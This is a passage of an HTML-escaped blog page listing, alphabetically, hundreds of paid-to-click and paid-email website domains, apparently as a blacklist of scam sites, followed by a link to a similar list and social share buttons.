/&gt;daddybux.com&lt;br /&gt;daddyclix.com&lt;br /&gt;dafbux.info&lt;br /&gt;dailybux.info&lt;br /&gt;dailycent.com&lt;br /&gt;dailyclicks.biz&lt;br /&gt;dailyclickspro.com&lt;br /&gt;darkptc.com&lt;br /&gt;daydayupemails.com&lt;br /&gt;dayscash.com&lt;br /&gt;dcbux.com&lt;br /&gt;deepseacash.com&lt;br /&gt;delta-cash.comdj-mails.com&lt;br /&gt;deluxe-bux.info&lt;br /&gt;deluxebux.com&lt;br /&gt;depacco.com&lt;br /&gt;desibux.com&lt;br /&gt;devilptc.com&lt;br /&gt;dicead.com&lt;br /&gt;dingobux.com&lt;br /&gt;directbux.com&lt;br /&gt;divinebux.com&lt;br /&gt;dolarbux.info&lt;br /&gt;dollarclix.org&lt;br /&gt;dollar-factory.com&lt;br /&gt;dollarbux.info&lt;br /&gt;dollarslove.com&lt;br /&gt;dolphindollarsgpt.com&lt;br /&gt;dolphincents.com&lt;br /&gt;dragone-search.com&lt;br /&gt;dragonhole.com&lt;br /&gt;dreambux.com&lt;br /&gt;dreamclix.net&lt;br /&gt;dreamptc.com&lt;br /&gt;dreamstarmail.com&lt;br /&gt;drumcash.com&lt;br /&gt;drunkbux.com&lt;br /&gt;dungeonanddragonemails.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;E&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;e-bux.us&lt;br /&gt;e-clickz.com&lt;br /&gt;ecash-generator.info&lt;br /&gt;eagleclicknet.com&lt;br /&gt;eagleclicks.info&lt;br /&gt;earn3.com&lt;br /&gt;earn10.net&lt;br /&gt;earn10bux.com&lt;br /&gt;earnbux.info&lt;br /&gt;earn.nu&lt;br /&gt;earnclick.net&lt;br /&gt;earningsecrets.com&lt;br /&gt;earnmybux.com&lt;br /&gt;earnptc.com&lt;br /&gt;earnup.com&lt;br /&gt;earnyourbux.com&lt;br /&gt;easy-clicks.net&lt;br /&gt;easy.tc&lt;br /&gt;easyclicks.org&lt;br /&gt;ecash-generator.info&lt;br /&gt;egyptclicks.com&lt;br /&gt;egyptianclicks.INFO, not the .com!!&lt;br /&gt;egyptptc.com&lt;br /&gt;eliteclicks.com&lt;br /&gt;email2rewards.com&lt;br /&gt;emailpremium.com&lt;br /&gt;emailprofit.us&lt;br /&gt;emailspayu.net&lt;br /&gt;emails-empire.com&lt;br /&gt;emeraldcoastptc.info&lt;br /&gt;englandbux.com&lt;br /&gt;englandbux.org&lt;br /&gt;enjoyfunds.com&lt;br /&gt;entroclicks.com&lt;br /&gt;epicclicks.com&lt;br /&gt;estbux.com&lt;br /&gt;eurobux.com&lt;br /&gt;eurobux.info&lt;br /&gt;eurobux.org&lt;br /&gt;eurocentsmail.com&lt;br /&gt;euroclick.com&lt;br /&gt;euroclickers.com&lt;br /&gt;eurovisits.org&lt;br /&gt;exothema.com&lt;br /&gt;expert-mails.com&lt;br /&gt;extra10.com&lt;br /&gt;extreme-ads.com&lt;br /&gt;extreme-bux.com&lt;br /&gt;extreme-earnings.com&lt;br /&gt;extremeclickerz.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;F&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;fairydollars.com&lt;br /&gt;famous-clickers.info&lt;br /&gt;fanclicks.info&lt;br /&gt;farland-cash.com&lt;br /&gt;fast.sc&lt;br /&gt;fastbux.com&lt;br /&gt;fastbux.org&lt;br /&gt;fastestbux.com&lt;br /&gt;fatcashcow.com&lt;br /&gt;feelbux.com&lt;br /&gt;fillmyaccount.com&lt;br /&gt;filmyinbox.com&lt;br /&gt;financialfreedomads.com&lt;br /&gt;finebux.com&lt;br /&gt;fishptc.info&lt;br /&gt;flashpay.tuaptc.org (partial to Italians … Mamma mia! )&lt;br /&gt;flashrich.com&lt;br /&gt;foobri.com&lt;br /&gt;forexbay.us&lt;br /&gt;foxcash.net&lt;br /&gt;freebiereferralsptc.com&lt;br /&gt;frei-bux.com&lt;br /&gt;fruitclicks.info&lt;br /&gt;ft-mails.com&lt;br /&gt;ftbux.com&lt;br /&gt;fuckingsituation.com&lt;br /&gt;fullbux.org&lt;br /&gt;funkycashmail.com&lt;br /&gt;futurebux.com&lt;br /&gt;futureclicks.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;G&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;gaborbux.com&lt;br /&gt;galaxybux.com&lt;br /&gt;gamma-cash.com&lt;br /&gt;gatorbux.com&lt;br /&gt;gem-mails.com&lt;br /&gt;getbuxed.com&lt;br /&gt;getclix.com&lt;br /&gt;getpaidbyemail.com&lt;br /&gt;getpaideasy.com&lt;br /&gt;getpaidtoguru.com&lt;br /&gt;getpaidwatch.com&lt;br /&gt;gg-bux.com&lt;br /&gt;ggmvp.org&lt;br /&gt;ggtheater.com&lt;br /&gt;gibux.com&lt;br /&gt;giftclicks.info&lt;br /&gt;gibuxsurf.com&lt;br /&gt;giga-cash.com&lt;br /&gt;gigabux.net&lt;br /&gt;gilligansptc.info&lt;br /&gt;globalptc.net&lt;br /&gt;globeptc.net&lt;br /&gt;goaio.com&lt;br /&gt;gogobux.com&lt;br /&gt;goldclicks.org&lt;br /&gt;golddiggerptc.info&lt;br /&gt;golddownline.com&lt;br /&gt;golden-bux.com&lt;br /&gt;goldenbux.net&lt;br /&gt;goldenemail.com&lt;br /&gt;golfmails.com&lt;br /&gt;goodbux.net&lt;br /&gt;goodluck-email.com&lt;br /&gt;google-mails.com&lt;br /&gt;got2pay.com&lt;br /&gt;gpm-ptc.net&lt;br /&gt;grandbux.org&lt;br /&gt;grapeclicks.info&lt;br /&gt;greatbux.com&lt;br /&gt;greenbux.com&lt;br /&gt;green-cash.com&lt;br /&gt;greetgold.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;H&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;halfmillionmails.com&lt;br /&gt;happyclix.net&lt;br /&gt;happyearning.com&lt;br /&gt;hero-mails.com&lt;br /&gt;hickclicks.com&lt;br /&gt;highbidppc.com&lt;br /&gt;hiperbux.info&lt;br /&gt;hispanobux.com&lt;br /&gt;hispanobux.es&lt;br /&gt;hitcoop.com&lt;br /&gt;hits4bux.com&lt;br /&gt;hitzmagic.com&lt;br /&gt;hkbux.com&lt;br /&gt;holiday-mails.com&lt;br /&gt;hollywood-mail.com&lt;br /&gt;holybux.info&lt;br /&gt;honestbux.com&lt;br /&gt;honestmails.com&lt;br /&gt;horrorptc.info&lt;br /&gt;hot-bux.info&lt;br /&gt;huge-mails.com&lt;br /&gt;hunbux.info&lt;br /&gt;husky-mails.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;I&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;icashout.net&lt;br /&gt;ice-mails.net&lt;br /&gt;icebux.com&lt;br /&gt;iclickclub.com&lt;br /&gt;idealbux.com&lt;br /&gt;ilikeemails.com&lt;br /&gt;impiggybank.com&lt;br /&gt;incentdollars.com&lt;br /&gt;incomebux.net&lt;br /&gt;incursiones.biz&lt;br /&gt;instantad.org&lt;br /&gt;instantbux.com&lt;br /&gt;instantlybux.com&lt;br /&gt;instantlyptc.com&lt;br /&gt;instantcashmakers.com&lt;br /&gt;instantlybux.com&lt;br /&gt;instantlyptc.com&lt;br /&gt;instantrustbux.com&lt;br /&gt;intbux.net&lt;br /&gt;interbux.info&lt;br /&gt;interbux.net&lt;br /&gt;intearn.com&lt;br /&gt;intgold.com&lt;br /&gt;ipbux.com&lt;br /&gt;ipcommunity.co.uk&lt;br /&gt;ippomails.com&lt;br /&gt;isabelmarco.com&lt;br /&gt;islandclicks.net&lt;br /&gt;italianptc.com&lt;br /&gt;iwantbux.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;J&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;jays-paidmail.com&lt;br /&gt;jazzyptc.info&lt;br /&gt;jetclicks.info&lt;br /&gt;jjlbux.com&lt;br /&gt;job-readmail.com&lt;br /&gt;joinbux.net&lt;br /&gt;jolilobux.com&lt;br /&gt;jreignsfim.com&lt;br /&gt;jthcorp.com&lt;br /&gt;junglecash.com&lt;br /&gt;just-ad.info&lt;br /&gt;just-click.us&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;K&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;kabelbux.com&lt;br /&gt;kessefkal.info&lt;br /&gt;kiddays.com&lt;br /&gt;kingbux.biz&lt;br /&gt;kingbux.com&lt;br /&gt;kitcatcash.com&lt;br /&gt;klikini.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;L&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;l33t-bux.com&lt;br /&gt;lastbux.com&lt;br /&gt;lava-bux.com&lt;br /&gt;legitbux.com&lt;br /&gt;libertycash.biz&lt;br /&gt;lifebux.com&lt;br /&gt;lightstarmail.com&lt;br /&gt;linato.shiftcode.com&lt;br /&gt;linkread.com&lt;br /&gt;links4cashonline.com&lt;br /&gt;littleengineptr.com&lt;br /&gt;lizardclicks.info&lt;br /&gt;loading-mails.com&lt;br /&gt;logans-legacy.com&lt;br /&gt;lolclicks.com&lt;br /&gt;lotionclicks.info&lt;br /&gt;loveads.pl&lt;br /&gt;loyalbux.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;M&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;macobux.com&lt;br /&gt;madabux.net&lt;br /&gt;madnessbux.com&lt;br /&gt;magicash.org&lt;br /&gt;magicdollar.info&lt;br /&gt;magicdragonhits.com&lt;br /&gt;magnetismail.com&lt;br /&gt;mainbux.com&lt;br /&gt;makefreemoneyonline&lt;br /&gt;makemybux.com&lt;br /&gt;makocashflow.com&lt;br /&gt;malisanko-emails.com&lt;br /&gt;mangoemails.com&lt;br /&gt;many-mails.com&lt;br /&gt;massiveptc.com&lt;br /&gt;masterbux.com&lt;br /&gt;masterclicks.com&lt;br /&gt;matrixptc.com&lt;br /&gt;matrixptc.com&lt;br /&gt;max-bux.com&lt;br /&gt;maxbux.info&lt;br /&gt;max-ptc.com&lt;br /&gt;maystromails.com&lt;br /&gt;mazbux.info&lt;br /&gt;mcbux.com&lt;br /&gt;mcbux.info&lt;br /&gt;mdbux.com (arabbux)&lt;br /&gt;meansbux.net (arabbux)&lt;br /&gt;medal-mails.com&lt;br /&gt;mega-ptr.com&lt;br /&gt;meggarichemails.com&lt;br /&gt;mellow-mails.com&lt;br /&gt;metal-emails.com&lt;br /&gt;metalpaidread.com&lt;br /&gt;meteor-mails.com&lt;br /&gt;michellesrandomizer.com&lt;br /&gt;mifriend.com&lt;br /&gt;milion-mail.com&lt;br /&gt;million-mails.com&lt;br /&gt;millionaire-mail.com&lt;br /&gt;mimimcash.com&lt;br /&gt;minbux.com&lt;br /&gt;mincashbux.com&lt;br /&gt;mixbux.com&lt;br /&gt;mnmbux.com&lt;br /&gt;moderndaybux.info&lt;br /&gt;moneybagsmail.com&lt;br /&gt;moneybux.biz&lt;br /&gt;moneybux.com&lt;br /&gt;moneybux.info&lt;br /&gt;moneybux.org&lt;br /&gt;moneyclicks.biz&lt;br /&gt;moneyems.com&lt;br /&gt;moneymouser.com&lt;br /&gt;moneysbank.com&lt;br /&gt;money-website.com&lt;br /&gt;monsterclix.info&lt;br /&gt;morehunks.com&lt;br /&gt;morpheusptc.com&lt;br /&gt;multibux.com&lt;br /&gt;musicbux.info&lt;br /&gt;mybizs.com&lt;br /&gt;mybux.in&lt;br /&gt;mycashout.net&lt;br /&gt;myministore.com&lt;br /&gt;myrealcash.net&lt;br /&gt;myspacetoearn.com&lt;br /&gt;mysweetheartmail.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;N&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;nationclicks.com&lt;br /&gt;nature-mails.com&lt;br /&gt;neonptc.com&lt;br /&gt;nerogpt.com&lt;br /&gt;netcash.com&lt;br /&gt;netcashbux.com&lt;br /&gt;netgold4u.com&lt;br /&gt;netwinner.com&lt;br /&gt;newbuxera.com&lt;br /&gt;newclicks.info&lt;br /&gt;nicebux.com&lt;br /&gt;nightbux.com&lt;br /&gt;ninebux.com&lt;br /&gt;number-emails.com&lt;br /&gt;numenmail.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;O&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;oasisclicks.com&lt;br /&gt;occupex.com&lt;br /&gt;ohomails.com&lt;br /&gt;oldchildclicks.cn&lt;br /&gt;oldschoolbux.com&lt;br /&gt;olympicbux.com&lt;br /&gt;onebux.net&lt;br /&gt;onedollarmail.com&lt;br /&gt;one-mails.com&lt;br /&gt;oneperson-mail.com&lt;br /&gt;online4ads.com&lt;br /&gt;onlinecashclicks.com&lt;br /&gt;onlybux.net&lt;br /&gt;onnetclicks.net&lt;br /&gt;opontes.info&lt;br /&gt;orangemails.com&lt;br /&gt;orbitclicks.com&lt;br /&gt;osobux.info&lt;br /&gt;oursharedsuccess.com&lt;br /&gt;ourpaidmail.com&lt;br /&gt;outlawbux.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;P&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;p2cdaily.com&lt;br /&gt;paid2clickonline.com&lt;br /&gt;paid4clicks.com&lt;br /&gt;paid.vg&lt;br /&gt;paid-ads.info&lt;br /&gt;paid-bux.info&lt;br /&gt;paidbux.com&lt;br /&gt;paidbux.org&lt;br /&gt;paidmail.italiabusiness.org&lt;br /&gt;paidmail.ru&lt;br /&gt;paidmailengine.com&lt;br /&gt;paidstation.com&lt;br /&gt;paidsolos.com&lt;br /&gt;paidtoclic.com&lt;br /&gt;paidtoclick.net&lt;br /&gt;paidtoclicknmore.com&lt;br /&gt;paidworld.com&lt;br /&gt;pandabux.com&lt;br /&gt;papajuan.info&lt;br /&gt;pay-dough.com&lt;br /&gt;pay-to-click.net&lt;br /&gt;paytoclick.biz&lt;br /&gt;pay2surf.net&lt;br /&gt;paykings.com&lt;br /&gt;paytc.net&lt;br /&gt;payptc.com&lt;br /&gt;payyou123.com&lt;br /&gt;payyoudollar.com&lt;br /&gt;pearclicks.info&lt;br /&gt;pekingcash.com&lt;br /&gt;perfect-emails.com&lt;br /&gt;perfectptc.com&lt;br /&gt;persianptc.com&lt;br /&gt;petromails.com&lt;br /&gt;phoenixcash.info&lt;br /&gt;pixie-clix.info&lt;br /&gt;pizzamails.com&lt;br /&gt;platinum-investment.com&lt;br /&gt;platinum-mails.com&lt;br /&gt;plusbux.com&lt;br /&gt;plutobux.com&lt;br /&gt;pol-bux.com&lt;br /&gt;polarbearmails.com&lt;br /&gt;popularbux.com&lt;br /&gt;pornobux.net&lt;br /&gt;potpourriclicks.info&lt;br /&gt;powderclicks.info&lt;br /&gt;powerbux.org&lt;br /&gt;prettyptr.com&lt;br /&gt;primebux.com&lt;br /&gt;pro-ads.net&lt;br /&gt;probux.info&lt;br /&gt;probux.net&lt;br /&gt;professionalbux.com&lt;br /&gt;profitfrommails.com&lt;br /&gt;profitwonderbux.com&lt;br /&gt;prowlingpantherptc.info&lt;br /&gt;ptc4you.com&lt;br /&gt;ptc-bux.com&lt;br /&gt;ptcad.net&lt;br /&gt;ptcaddicts.com&lt;br /&gt;ptcash.biz&lt;br /&gt;ptcclickers.com (arabbux)&lt;br /&gt;ptcitalian.com&lt;br /&gt;ptcnation.org&lt;br /&gt;ptcprocash.com&lt;br /&gt;ptr-hun.com&lt;br /&gt;ptr-trading.com&lt;br /&gt;puppypaid2clicks.com&lt;br /&gt;pure-clicks.com&lt;br /&gt;purpletulips.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Q&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;quality-profits.com&lt;br /&gt;quebecptr.com&lt;br /&gt;quick-clix.com&lt;br /&gt;quickerclix.com&lt;br /&gt;quickestshare.com&lt;br /&gt;quickwin.org&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;R&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;rabbit-mails.com&lt;br /&gt;race4click.shiftcode.com&lt;br /&gt;rainbow-mails.com&lt;br /&gt;rainingbux.com&lt;br /&gt;ranocash.com&lt;br /&gt;redbux.com&lt;br /&gt;redroseptc.info&lt;br /&gt;realbux.us&lt;br /&gt;realmails.com&lt;br /&gt;redlightdistrictptc.info&lt;br /&gt;redroseptc.info&lt;br /&gt;referralbux.com&lt;br /&gt;remotebux.net&lt;br /&gt;retrobux.com&lt;br /&gt;rivermails.com&lt;br /&gt;rocashbux.info&lt;br /&gt;roflbux.com&lt;br /&gt;rolex-mails.com&lt;br /&gt;rosebux.com&lt;br /&gt;rosenet-emails.com&lt;br /&gt;roudycash.com&lt;br /&gt;royalbux.ch&lt;br /&gt;rubybux&lt;br /&gt;rundownbux.com&lt;br /&gt;rundownbux.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;S&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Sandraclicks.com&lt;br /&gt;sansabux.info&lt;br /&gt;scambux.com&lt;br /&gt;scarlettmails.com&lt;br /&gt;scotbux.co.uk&lt;br /&gt;sea-mails.com&lt;br /&gt;seabux.com&lt;br /&gt;sebasbux.com&lt;br /&gt;secret-mails.net&lt;br /&gt;seekcashmail.com&lt;br /&gt;sepooq.com&lt;br /&gt;seriousbucks.com&lt;br /&gt;seriouxclickers.com&lt;br /&gt;seven-bux.com&lt;br /&gt;sexybux.com&lt;br /&gt;shirecash.com&lt;br /&gt;signptc.info&lt;br /&gt;silvanamails.com&lt;br /&gt;silverbux.com&lt;br /&gt;simplestash.com&lt;br /&gt;simplybux.com&lt;br /&gt;simplyptc.com&lt;br /&gt;simpsonsbux.com&lt;br /&gt;sirensongptc.info&lt;br /&gt;siteclubemail.com&lt;br /&gt;smartbux.net&lt;br /&gt;smartclicks.com&lt;br /&gt;smartclicks.shiftcode.com&lt;br /&gt;smile-email.com&lt;br /&gt;smithbux.com&lt;br /&gt;smoothbux.net&lt;br /&gt;smurfybux.com&lt;br /&gt;snoopycash.com&lt;br /&gt;snowballclicks.com&lt;br /&gt;softbux.com&lt;br /&gt;softbux.net&lt;br /&gt;solarclick.com&lt;br /&gt;solutionscode.com&lt;br /&gt;soulbux.com&lt;br /&gt;southmails.com&lt;br /&gt;spainbux.com&lt;br /&gt;spartaclicks.com&lt;br /&gt;speedbux.org&lt;br /&gt;speedybux.info&lt;br /&gt;spiderbux.com&lt;br /&gt;spikebux.info&lt;br /&gt;splashptc.com&lt;br /&gt;sprint-cash.com&lt;br /&gt;spidermanemails.com&lt;br /&gt;spongebobclicks.info&lt;br /&gt;stablebux.com&lt;br /&gt;storybux.com&lt;br /&gt;strawberryclicks.com&lt;br /&gt;strawberryclicks.info&lt;br /&gt;strongptr.com&lt;br /&gt;studio-mail.com&lt;br /&gt;sunday-mails.com&lt;br /&gt;super-bux.net&lt;br /&gt;superbux.info&lt;br /&gt;super-program.com&lt;br /&gt;superstarmail.com&lt;br /&gt;sure2click.com&lt;br /&gt;surf-ads.net&lt;br /&gt;surfanearn.net&lt;br /&gt;surfcash.net&lt;br /&gt;surfjunky.com&lt;br /&gt;surforhits.com&lt;br /&gt;surprisemails.com&lt;br /&gt;swimming-dolphins.info&lt;br /&gt;sysbux.com&lt;br /&gt;systemmails.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;T&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;taketheglobe.com&lt;br /&gt;tarbux.com&lt;br /&gt;tata-cash.com&lt;br /&gt;teambux.com.ar&lt;br /&gt;technobux.com&lt;br /&gt;ten-ads.net&lt;br /&gt;tendollarsmail.com&lt;br /&gt;teneuromail.com&lt;br /&gt;thebux.com&lt;br /&gt;thebux.info&lt;br /&gt;thedailyprofit.net&lt;br /&gt;thegoldclick.com&lt;br /&gt;thegoldmail.com&lt;br /&gt;theprofithouse.com&lt;br /&gt;therichcash.com&lt;br /&gt;thinkbux.com&lt;br /&gt;throttlebux.com&lt;br /&gt;timebux.com&lt;br /&gt;timeforcafe.com&lt;br /&gt;timelessearn.com&lt;br /&gt;tincity.net&lt;br /&gt;tiserbux.net&lt;br /&gt;tnt-e-mail.com&lt;br /&gt;tobux.com&lt;br /&gt;tombmailer.com&lt;br /&gt;tons-referrals.com&lt;br /&gt;topbux.com&lt;br /&gt;topbux.org&lt;br /&gt;topdollaremails.com&lt;br /&gt;trade-mails.com&lt;br /&gt;traffic2clicks.com&lt;br /&gt;trafficbux.com&lt;br /&gt;treeclicks.info&lt;br /&gt;triplebux.com&lt;br /&gt;tropicalptc.netsons.org&lt;br /&gt;trustfulmail.com&lt;br /&gt;tumoney.com&lt;br /&gt;turbobux.com&lt;br /&gt;twodollarsmail.com&lt;br /&gt;tycoonmails.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;U&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;ubiclick.net&lt;br /&gt;ubizs.com&lt;br /&gt;ubux.biz&lt;br /&gt;ubux.tk&lt;br /&gt;uclix.ws&lt;br /&gt;ugains.com&lt;br /&gt;uggibux.com&lt;br /&gt;uggicorp.com&lt;br /&gt;uniclix.com&lt;br /&gt;uniquebux.info&lt;br /&gt;united-empire.com&lt;br /&gt;universalclix.com.br&lt;br /&gt;unlimitedbux.info&lt;br /&gt;uronlinebux.com&lt;br /&gt;usa-canada-email.com&lt;br /&gt;utopiabux.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;V&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;velocityclicks.com&lt;br /&gt;view-ads.net&lt;br /&gt;vipbux.com&lt;br /&gt;view4pay.com&lt;br /&gt;Viper-clicks.com&lt;br /&gt;visible-better.com&lt;br /&gt;visit4cash.net&lt;br /&gt;voobux.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;W&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;waoindia.com&lt;br /&gt;warm-mails.com&lt;br /&gt;webbercash.com&lt;br /&gt;wepaybux.com&lt;br /&gt;wingmails.com&lt;br /&gt;winkbux.com&lt;br /&gt;wolfbux.com&lt;br /&gt;woo-mails.com&lt;br /&gt;wordlyptc.info&lt;br /&gt;workfor1dollar.com&lt;br /&gt;workmails.com&lt;br /&gt;world-bux.com&lt;br /&gt;World-Clix.com&lt;br /&gt;worldofbux.com&lt;br /&gt;worldwidemails.com&lt;br /&gt;wrmoney.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;X&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;x-bux.net&lt;br /&gt;x3bux.com&lt;br /&gt;xbux.com&lt;br /&gt;xclix.net&lt;br /&gt;xeni.dk&lt;br /&gt;xs-ptc.org&lt;br /&gt;xtrabux.net&lt;br /&gt;xtremeclickerz.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Y&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;y2e.info&lt;br /&gt;yayclick.com&lt;br /&gt;yesptc.info&lt;br /&gt;yourbux.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Z&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;zbestbux.com&lt;br /&gt;zetbux.com&lt;br /&gt;zubux.com&lt;br /&gt;zwallet.com&lt;br /&gt;zxclicks.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;039.biz&lt;br /&gt;07Bux.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1-800-mail.com&lt;br /&gt;10bux.net&lt;br /&gt;10clix.com&lt;br /&gt;100-dollars-mail.com&lt;br /&gt;100-percents-work-bux.com&lt;br /&gt;100cents-1000dollars.com&lt;br /&gt;100dollarsmails.com&lt;br /&gt;101clix.com&lt;br /&gt;1bux.org&lt;br /&gt;1stbux.com&lt;br /&gt;1stprofit.com&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;2&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;2009-bux.com&lt;br /&gt;200dollars-email.com&lt;br /&gt;200dollarsmail.com&lt;br /&gt;200eurocent-200euro.com&lt;br /&gt;200euromails.com&lt;br /&gt;20dollarsmail.com&lt;br /&gt;24bux.com&lt;br /&gt;247bux.com&lt;br /&gt;25dollarsmail.com&lt;br /&gt;25-dollars-mail.com&lt;br /&gt;2bux.com&lt;br /&gt;2bux.net&lt;br /&gt;2dollaremails.com&lt;br /&gt;2ree.net&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;3&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;300dollarsmail.com&lt;br /&gt;30dollarsmail.com&lt;br /&gt;37-21mail.com&lt;br /&gt;3rbux.com&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;4&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4bux.info&lt;br /&gt;400dollarsmail.com&lt;br /&gt;4starads.info&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;5&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;50centmails.com&lt;br /&gt;500cents-500dollars.net&lt;br /&gt;500cents-500dollars.org&lt;br /&gt;500pounds-and-500pence.com&lt;br /&gt;50dollarsmail.com&lt;br /&gt;520Searcher.com&lt;br /&gt;5bux.com&lt;br /&gt;5buxs.cn&lt;br /&gt;5ivebux.com&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;6&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;60euromail.com&lt;br /&gt;666mails.com&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;7&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;7centsolos.com&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;8cent-emails.com&lt;br /&gt;80euromail.com&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;9&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;9bux.info&lt;br /&gt;99centclicks.info&lt;br /&gt;9icebux.com&lt;br /&gt;&lt;br /&gt;You can also visit:&lt;a href="http://www.ixibo.com/2009/02/black-listed-domains-list-scam-sites/"&gt; http://www.ixibo.com/2009/02/black-listed-domains-list-scam-sites/&lt;/a&gt;   for more information.&lt;br /&gt;      &lt;br /&gt;         &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;        &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;    &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script 